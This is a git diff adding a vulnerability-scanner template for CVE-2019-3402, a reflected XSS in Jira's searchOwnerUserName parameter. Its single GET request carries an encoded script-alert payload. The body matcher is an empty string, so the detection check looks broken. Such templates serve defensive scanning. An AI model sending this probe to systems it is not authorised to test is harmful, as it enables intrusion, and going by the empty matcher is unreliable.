diff --git a/cves/CVE-2019-3402.yaml b/cves/CVE-2019-3402.yaml new file mode 100644 index 0000000000..e907496470 --- /dev/null +++ b/cves/CVE-2019-3402.yaml @@ -0,0 +1,24 @@ +id: cve-2019-3402 + +info: + name: Jira - Reflected XSS using searchOwnerUserName parameter. + author: pdteam + severity: medium + description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. + + # Source:- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c + +requests: + - method: GET + path: + - "{{BaseURL}}//secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body \ No newline at end of file